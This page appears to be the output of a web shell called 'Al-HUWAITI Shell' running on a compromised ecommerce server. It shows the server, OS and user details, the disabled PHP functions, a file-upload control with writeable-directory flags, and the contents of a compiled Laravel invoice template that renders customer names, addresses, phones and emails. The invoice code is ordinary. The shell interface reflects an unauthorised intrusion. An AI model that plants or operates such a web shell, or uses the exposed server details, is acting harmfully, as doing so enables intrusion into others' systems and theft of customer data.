Al-HUWAITI Shell
Al-huwaiti


Server : nginx/1.18.0
System : Linux localhost 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /var/www/ecommerce/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/ecommerce/storage/framework/views/505910b8e174b1c6c7a97e0ba6ff34828131681d.php
<!DOCTYPE html>
<html>

<head>
    <title>Order <?php if($order): ?>- <?php echo e($order->order_number); ?> <?php endif; ?></title>
    <link rel="stylesheet" href="<?php echo asset('frontend/css/app.css'); ?>" />
</head>

<body>

    <?php if($order): ?>
        <style type="text/css">
            .invoice-header {
                background: #f7f7f7;
                padding: 10px 20px 10px 20px;
                border-bottom: 1px solid gray;
            }

            .site-logo {
                margin-top: 20px;
            }

            .invoice-right-top h3 {
                padding-right: 20px;
                margin-top: 20px;
                color: green;
                font-size: 30px !important;
                font-family: serif;
            }

            .invoice-left-top {
                border-left: 4px solid green;
                padding-left: 20px;
                padding-top: 20px;
            }

            .invoice-left-top p {
                margin: 0;
                line-height: 20px;
                font-size: 16px;
                margin-bottom: 3px;
            }

            thead {
                background: green;
                color: #FFF;
            }

            .authority h5 {
                margin-top: -10px;
                color: green;
            }

            .thanks h4 {
                color: green;
                font-size: 25px;
                font-weight: normal;
                font-family: serif;
                margin-top: 20px;
            }

            .site-address p {
                line-height: 6px;
                font-weight: 300;
            }

            .table tfoot .empty {
                border: none;
            }

            .table-bordered {
                border: none;
            }

            .table-header {
                padding: .75rem 1.25rem;
                margin-bottom: 0;
                background-color: rgba(0, 0, 0, .03);
                border-bottom: 1px solid rgba(0, 0, 0, .125);
            }

            .table td,
            .table th {
                padding: .30rem;
            }

            .site-logo img {
                height: 28px;
            }

            .site-logo .logo-text {
                color: black;
                font-size: 21px;
                font-weight: 600;
            }

            .site-logo .logo-sub-text {
                color: black;
                font-size: 10px;
                letter-spacing: 4px;
                position: absolute;
                bottom: 0;
                left: 34px;
            }
        </style>
        <div class="invoice-header">
            <div class="float-left site-logo position-relative">
                <img src="<?php echo asset('assets/images/etiqafinans_logo_coloured.png'); ?>">
                <span class="logo-text">EtiqaFinans</span>
                <span class="logo-sub-text">Own with ease</span></a>
            </div>
            <div class="float-right site-address">
                <h4><?php echo e(env('APP_NAME')); ?></h4>
                <p><?php echo e(env('APP_ADDRESS')); ?></p>
                <p>Phone: <a href="tel:<?php echo e(env('APP_PHONE')); ?>"><?php echo e(env('APP_PHONE')); ?></a></p>
                <p>Email: <a href="mailto:<?php echo e(env('APP_EMAIL')); ?>"><?php echo e(env('APP_EMAIL')); ?></a></p>
            </div>
            <div class="clearfix"></div>
        </div>
        <div class="invoice-description">
            <div class="invoice-left-top float-left">
                <h6>Invoice to</h6>
                <h3><?php echo e($order->first_name); ?> <?php echo e($order->last_name); ?></h3>
                <div class="address">
                    <p>
                        <strong>Country: </strong>
                        <?php echo e($order->country); ?>

                    </p>
                    <p>
                        <strong>Address: </strong>
                        <?php echo e($order->address1); ?> OR <?php echo e($order->address2); ?>

                    </p>
                    <p><strong>Phone:</strong> <?php echo e($order->phone); ?></p>
                    <p><strong>Email:</strong> <?php echo e($order->email); ?></p>
                </div>
            </div>
            <div class="invoice-right-top float-right" class="text-right">
                <h3>Invoice #<?php echo e($order->order_number); ?></h3>
                <p><?php echo e($order->created_at->format('D, jS M Y')); ?></p>
                
            </div>
            <div class="clearfix"></div>
        </div>
        <section class="order_details pt-3">
            <div class="table-header">
                <h5>Order Details</h5>
            </div>
            <table class="table table-bordered text-nowrap table-stripe">
                <thead>
                    <tr>
                        <th scope="col" class="col-6">Product</th>
                        <th scope="col" class="col-3">Quantity</th>
                        <th scope="col" class="col-3">Total</th>
                    </tr>
                </thead>
                <tbody>
                    <?php $__currentLoopData = $order->cart_info; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $cart): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <?php
                            $product = DB::table('products')
                                ->select('title')
                                ->where('id', $cart->product_id)
                                ->get();
                        ?>
                        <tr>
                            <td><span>
                                    <?php $__currentLoopData = $product; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $pro): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <?php echo e($pro->title); ?>

                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                </span></td>
                            <td>x<?php echo e($cart->quantity); ?></td>
                            <td><span><?php echo config('shop.currency_symbol'); ?> <?php echo e(number_format($cart->price, 2)); ?></span></td>
                        </tr>
                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                </tbody>
                <tfoot>
                    <tr>
                        <th scope="col" class="empty"></th>
                        <th scope="col" class="text-right">Subtotal:</th>
                        <th scope="col"> <span><?php echo config('shop.currency_symbol'); ?> <?php echo e(number_format($order->sub_total, 2)); ?></span>
                        </th>
                    </tr>

                    <tr>
                        <th scope="col" class="empty"></th>
                        <th scope="col" class="text-right ">Shipping:</th>
                        <th><span><?php echo config('shop.currency_symbol'); ?> <?php echo e(number_format($order->shipping?->price ?? 0, 2)); ?></span></th>
                    </tr>
                    <tr>
                        <th scope="col" class="empty"></th>
                        <th scope="col" class="text-right">Total:</th>
                        <th>
                            <span>
                                <?php echo config('shop.currency_symbol'); ?> <?php echo e(number_format($order->total_amount, 2)); ?>

                            </span>
                        </th>
                    </tr>
                </tfoot>
            </table>
        </section>
        <div class="thanks mt-3">
            <h4>Thank you for your business !!</h4>
        </div>
        <div class="authority float-right mt-5">
            <p>-----------------------------------</p>
            <h5>Authority Signature:</h5>
        </div>
        <div class="clearfix"></div>
    <?php else: ?>
        <h5 class="text-danger">Invalid</h5>
    <?php endif; ?>
</body>

</html>
<?php /**PATH /var/www/ecommerce/resources/views/backend/order/pdf.blade.php ENDPATH**/ ?>

Al-HUWAITI Shell